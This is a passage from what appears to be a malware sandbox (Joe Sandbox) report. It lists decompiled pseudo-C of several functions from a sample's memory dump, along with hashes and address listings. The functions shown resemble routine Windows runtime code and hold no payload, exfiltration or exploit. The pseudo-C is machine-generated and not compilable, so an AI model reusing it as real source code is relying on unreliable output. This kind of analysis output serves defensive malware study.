                                                                              • Instruction Fuzzy Hash: FA311831F001256BEB1A9B69CC44BBFFBA6EF84310F154469E801E7641DA74CE80C650
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0182FDE2 Relevance: .1, Instructions: 116COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 76%
                                                                              			E0182FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0182FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E01830A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E01787D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E01821608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E01832B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0182C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0182DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E01787D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0182A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                                                              0x0182fde7
                                                                              0x0182fde8
                                                                              0x0182fdec
                                                                              0x0182fdee
                                                                              0x0182fdf5
                                                                              0x0182fdf7
                                                                              0x0182fdfc
                                                                              0x0182fe19
                                                                              0x0182fe22
                                                                              0x0182fe26
                                                                              0x0182fec6
                                                                              0x0182fecd
                                                                              0x0182fed5
                                                                              0x0182fee7
                                                                              0x0182fed7
                                                                              0x0182fee0
                                                                              0x0182fee0
                                                                              0x0182feef
                                                                              0x0182ff00
                                                                              0x0182ff02
                                                                              0x0182ff07
                                                                              0x0182ff07
                                                                              0x00000000
                                                                              0x0182feef
                                                                              0x0182fe33
                                                                              0x0182fe55
                                                                              0x0182fe59
                                                                              0x0182fe5b
                                                                              0x0182fe5e
                                                                              0x0182fe69
                                                                              0x0182fe6d
                                                                              0x0182fe6d
                                                                              0x0182fe69
                                                                              0x0182fe35
                                                                              0x0182fe41
                                                                              0x0182fe41
                                                                              0x0182fe79
                                                                              0x0182fe8b
                                                                              0x0182fe7b
                                                                              0x0182fe84
                                                                              0x0182fe84
                                                                              0x0182fe93
                                                                              0x00000000
                                                                              0x0182fea8
                                                                              0x0182feba
                                                                              0x00000000
                                                                              0x0182feba
                                                                              0x0182fdfe
                                                                              0x0182fe01
                                                                              0x0182fe02
                                                                              0x0182fe08
                                                                              0x0182ff0c
                                                                              0x0182ff14
                                                                              0x0182ff14

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                              • Instruction ID: 447208209abbba4fa8bd1e84dd07c2fcb71d912914a925047c6fb8f42eca72ac
                                                                              • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                              • Instruction Fuzzy Hash: EA311436200655AFD3279B6CC844F6ABBFAEFC5B50F184058E646CB346DA74DE81C760
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0182EA55 Relevance: .1, Instructions: 111COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 70%
                                                                              			E0182EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E01782280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0182E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E0176F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E0177FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0182AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0182BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E01787D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E0181FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E0177FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0182A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                                                                              0x0182ea55
                                                                              0x0182ea66
                                                                              0x0182ea68
                                                                              0x0182ea6c
                                                                              0x0182ea6f
                                                                              0x0182ea72
                                                                              0x0182ea75
                                                                              0x0182ea7a
                                                                              0x0182ea7a
                                                                              0x0182ea7e
                                                                              0x0182ea80
                                                                              0x0182ea85
                                                                              0x0182ea8b
                                                                              0x0182eab5
                                                                              0x0182eabc
                                                                              0x0182eabf
                                                                              0x0182eabf
                                                                              0x0182eaca
                                                                              0x0182eace
                                                                              0x0182ead0
                                                                              0x0182eae4
                                                                              0x0182eaeb
                                                                              0x0182eaf0
                                                                              0x0182eaf5
                                                                              0x0182eb09
                                                                              0x0182eb0d
                                                                              0x0182eb1d
                                                                              0x0182eb2d
                                                                              0x0182eb38
                                                                              0x0182eb3d
                                                                              0x0182eb41
                                                                              0x0182eb4a
                                                                              0x0182eb60
                                                                              0x0182eb4c
                                                                              0x0182eb52
                                                                              0x0182eb59
                                                                              0x0182eb59
                                                                              0x0182eb68
                                                                              0x0182eb71
                                                                              0x0182eb71
                                                                              0x0182ea8d
                                                                              0x0182ea8f
                                                                              0x0182ea92
                                                                              0x0182ea97
                                                                              0x0182ea97
                                                                              0x0182ea9b
                                                                              0x0182ea9c
                                                                              0x0182ea9e
                                                                              0x0182eaa6
                                                                              0x0182eaa6
                                                                              0x0182eb7e

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                              • Instruction ID: b997686e7d6b4c5ce57c7837866705c43a2f1ccc5c114f0abc0d1d10aeb057ac
                                                                              • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                              • Instruction Fuzzy Hash: 5B31C172604706ABC71ADF28C884A6BB7A9FFD0310F04492DE593C7645EE30E945CBA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017E69A6 Relevance: .1, Instructions: 108COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 69%
                                                                              			E017E69A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x185d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L01776C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E017E6BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E017A9980() >= 0) {
							E01782280(_t56, 0x1858778);
							_t77 = 1;
							_t68 = 1;
							if( *0x1858774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x1858774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E0176B6F0(0x174c338, 0x174c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E017A9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E017A95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E0177FFB0(_t68, _t77, 0x1858778);
				}
				_pop(_t78);
				return E017AB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                                              0x017e69b5
                                                                              0x017e69be
                                                                              0x017e69c3
                                                                              0x017e69c9
                                                                              0x017e69cc
                                                                              0x017e69d1
                                                                              0x017e69d3
                                                                              0x017e69de
                                                                              0x017e69e1
                                                                              0x017e69ea
                                                                              0x017e69f6
                                                                              0x017e69fe
                                                                              0x017e6a13
                                                                              0x017e6a14
                                                                              0x017e6a15
                                                                              0x017e6a16
                                                                              0x017e6a1e
                                                                              0x017e6a26
                                                                              0x017e6a31
                                                                              0x017e6a36
                                                                              0x017e6a37
                                                                              0x017e6a40
                                                                              0x017e6a49
                                                                              0x017e6a4a
                                                                              0x017e6a53
                                                                              0x017e6a59
                                                                              0x017e6a5d
                                                                              0x017e6a5e
                                                                              0x017e6a64
                                                                              0x017e6a67
                                                                              0x017e6a6a
                                                                              0x017e6a6d
                                                                              0x017e6a70
                                                                              0x017e6a77
                                                                              0x017e6a7d
                                                                              0x017e6a86
                                                                              0x017e6a89
                                                                              0x017e6a9c
                                                                              0x017e6a9f
                                                                              0x017e6aa2
                                                                              0x017e6aa5
                                                                              0x017e6aaf
                                                                              0x017e6ab1
                                                                              0x017e6ab8
                                                                              0x017e6ab9
                                                                              0x017e6abb
                                                                              0x017e6abe
                                                                              0x017e6ac5
                                                                              0x017e6ac5
                                                                              0x017e6aaf
                                                                              0x017e6a40
                                                                              0x017e6a26
                                                                              0x017e69fe
                                                                              0x017e6ace
                                                                              0x017e6ad0
                                                                              0x017e6ad3
                                                                              0x017e6ad8
                                                                              0x017e6adf
                                                                              0x017e6adf
                                                                              0x017e6ae8
                                                                              0x017e6aef
                                                                              0x017e6aef
                                                                              0x017e6af9
                                                                              0x017e6b06

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ecc3f560956124ca3ea27ae700003fe38a5c472d6c1c58dab6e43a4a0e013531
                                                                              • Instruction ID: 42cefbd3ccf4691bafa26c311015f3bdb8865e1c16eeff83b7280fb6a21f34e6
                                                                              • Opcode Fuzzy Hash: ecc3f560956124ca3ea27ae700003fe38a5c472d6c1c58dab6e43a4a0e013531
                                                                              • Instruction Fuzzy Hash: 45417BB1D01209AFDB20DFAAC944BEEFBF8EF58714F14812AE914E3240DB749A05CB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01765210 Relevance: .1, Instructions: 107COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 85%
                                                                              			E01765210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E017652A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E017A95D0();
							L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E0177EB70(_t54, 0x18579a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E017A95D0();
								L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E0177EB70(_t54, 0x18579a0);
						}
						return _t52;
					}
					L5:
					_t33 = E017AF3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E0177EB70(_t54, 0x18579a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E017A95D0();
							L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                                              0x01765220
                                                                              0x01765224
                                                                              0x017c0d13
                                                                              0x017c0d16
                                                                              0x017c0d19
                                                                              0x0176522a
                                                                              0x0176522a
                                                                              0x0176522d
                                                                              0x0176522d
                                                                              0x01765231
                                                                              0x01765235
                                                                              0x01765239
                                                                              0x017c0d5c
                                                                              0x017c0d62
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017c0d6a
                                                                              0x017c0d7b
                                                                              0x017c0d7f
                                                                              0x017c0d81
                                                                              0x017c0d84
                                                                              0x017c0d95
                                                                              0x017c0d95
                                                                              0x017c0d6c
                                                                              0x017c0d71
                                                                              0x017c0d71
                                                                              0x017c0d9a
                                                                              0x00000000
                                                                              0x0176524a
                                                                              0x0176524a
                                                                              0x01765250
                                                                              0x017c0d24
                                                                              0x017c0d35
                                                                              0x017c0d39
                                                                              0x017c0d3b
                                                                              0x017c0d3e
                                                                              0x017c0d50
                                                                              0x017c0d50
                                                                              0x017c0d26
                                                                              0x017c0d2b
                                                                              0x017c0d2b
                                                                              0x00000000
                                                                              0x017c0d55
                                                                              0x01765256
                                                                              0x0176525b
                                                                              0x01765265
                                                                              0x017c0da7
                                                                              0x0176526b
                                                                              0x0176526e
                                                                              0x01765272
                                                                              0x017c0db1
                                                                              0x017c0db4
                                                                              0x017c0dc5
                                                                              0x017c0dc5
                                                                              0x01765272
                                                                              0x01765278
                                                                              0x0176527e
                                                                              0x0176528a
                                                                              0x0176528c
                                                                              0x0176528d
                                                                              0x00000000
                                                                              0x01765280
                                                                              0x01765282
                                                                              0x01765288
                                                                              0x0176529f
                                                                              0x01765292
                                                                              0x00000000
                                                                              0x01765292
                                                                              0x00000000
                                                                              0x01765288
                                                                              0x0176527e

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 38c8e24deabd7519b9d0c502e22bcc4b5a57ae25cb149edf9aea66bf7dc7823b
                                                                              • Instruction ID: 14610e16837a2f31d18b292ba711db4f9d271b3ec8c8da574d79130765561b16
                                                                              • Opcode Fuzzy Hash: 38c8e24deabd7519b9d0c502e22bcc4b5a57ae25cb149edf9aea66bf7dc7823b
                                                                              • Instruction Fuzzy Hash: F0311671245601EFC726AB18C885F2AFBA9FF50B60F10466EF9564B2A4DB20ED40C6D0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A3D43 Relevance: .1, Instructions: 106COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E017A3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E01777B60(0, _t61, 0x17411c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E01777B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L01784620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                                              0x017a3d4c
                                                                              0x017a3d50
                                                                              0x017a3d55
                                                                              0x017a3d5e
                                                                              0x017de79a
                                                                              0x00000000
                                                                              0x017de79a
                                                                              0x017a3d68
                                                                              0x017de789
                                                                              0x017a3d9d
                                                                              0x017a3da3
                                                                              0x017a3daf
                                                                              0x017a3db5
                                                                              0x017a3dbc
                                                                              0x017a3dc4
                                                                              0x017a3dc9
                                                                              0x017a3dce
                                                                              0x017de7ae
                                                                              0x017de7ae
                                                                              0x017a3dde
                                                                              0x017a3de2
                                                                              0x017a3de7
                                                                              0x017a3e0d
                                                                              0x017a3e13
                                                                              0x017a3e16
                                                                              0x017a3e1e
                                                                              0x017a3e25
                                                                              0x017a3e28
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017a3e2a
                                                                              0x017a3e2f
                                                                              0x017a3e37
                                                                              0x017a3e37
                                                                              0x00000000
                                                                              0x017a3e37
                                                                              0x017a3e31
                                                                              0x00000000
                                                                              0x017a3e31
                                                                              0x017a3e20
                                                                              0x017a3e20
                                                                              0x017a3e35
                                                                              0x00000000
                                                                              0x017a3de9
                                                                              0x017a3de9
                                                                              0x017a3de9
                                                                              0x017a3dee
                                                                              0x017a3dfd
                                                                              0x017a3dff
                                                                              0x017a3e02
                                                                              0x017a3e05
                                                                              0x017a3e05
                                                                              0x00000000
                                                                              0x017a3df0
                                                                              0x017a3de7
                                                                              0x017de78f
                                                                              0x017de794
                                                                              0x017a3d79
                                                                              0x017a3d84
                                                                              0x017a3d89
                                                                              0x017a3d8e
                                                                              0x00000000
                                                                              0x017de7a4
                                                                              0x017a3d96
                                                                              0x017a3d9a
                                                                              0x00000000
                                                                              0x017a3d9a
                                                                              0x00000000
                                                                              0x017de794
                                                                              0x017a3d6e
                                                                              0x017a3d73
                                                                              0x00000000
                                                                              0x017de7b5
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 64251bd6921e7a00c9491235f9ba7947fb3ea6b0a44b722235f1e777e199378d
                                                                              • Instruction ID: 64c48935aab4089b36e111d7fd140af033b2245b03d7d9c46ca3e13db2103865
                                                                              • Opcode Fuzzy Hash: 64251bd6921e7a00c9491235f9ba7947fb3ea6b0a44b722235f1e777e199378d
                                                                              • Instruction Fuzzy Hash: 8531DE32A05615DBD7298F2DC841A3AFBF4FF99710B4582AEE949CB350EB30D880C790
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0179A61C Relevance: .1, Instructions: 106COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 78%
                                                                              			E0179A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x1840220);
				E017BD08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x1857b9c; // 0x0
				_t55 = L01784620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E017BD0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x1857b10 =  *0x1857b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x185536c; // 0x771a5368
					if( *_t51 != 0x1855368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x1855368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x185536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0179A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                                              0x0179a61c
                                                                              0x0179a61e
                                                                              0x0179a623
                                                                              0x0179a628
                                                                              0x0179a62b
                                                                              0x0179a62d
                                                                              0x0179a648
                                                                              0x0179a64a
                                                                              0x0179a64f
                                                                              0x017d9b44
                                                                              0x0179a6ec
                                                                              0x0179a6f1
                                                                              0x0179a6f1
                                                                              0x0179a655
                                                                              0x0179a657
                                                                              0x0179a65a
                                                                              0x0179a65d
                                                                              0x0179a662
                                                                              0x0179a663
                                                                              0x0179a667
                                                                              0x0179a668
                                                                              0x0179a66d
                                                                              0x0179a706
                                                                              0x0179a706
                                                                              0x017d9bda
                                                                              0x017d9be6
                                                                              0x017d9beb
                                                                              0x00000000
                                                                              0x017d9beb
                                                                              0x0179a679
                                                                              0x017d9b7a
                                                                              0x00000000
                                                                              0x017d9b7a
                                                                              0x0179a683
                                                                              0x0179a6f4
                                                                              0x0179a6f7
                                                                              0x0179a6f9
                                                                              0x0179a6fd
                                                                              0x0179a6a0
                                                                              0x0179a6a0
                                                                              0x0179a6ad
                                                                              0x0179a6af
                                                                              0x0179a6b4
                                                                              0x017d9ba7
                                                                              0x017d9bac
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d9bc6
                                                                              0x017d9bce
                                                                              0x017d9bd1
                                                                              0x017d9bd3
                                                                              0x017d9bd3
                                                                              0x00000000
                                                                              0x017d9bd1
                                                                              0x0179a6bd
                                                                              0x0179a6c3
                                                                              0x0179a6c6
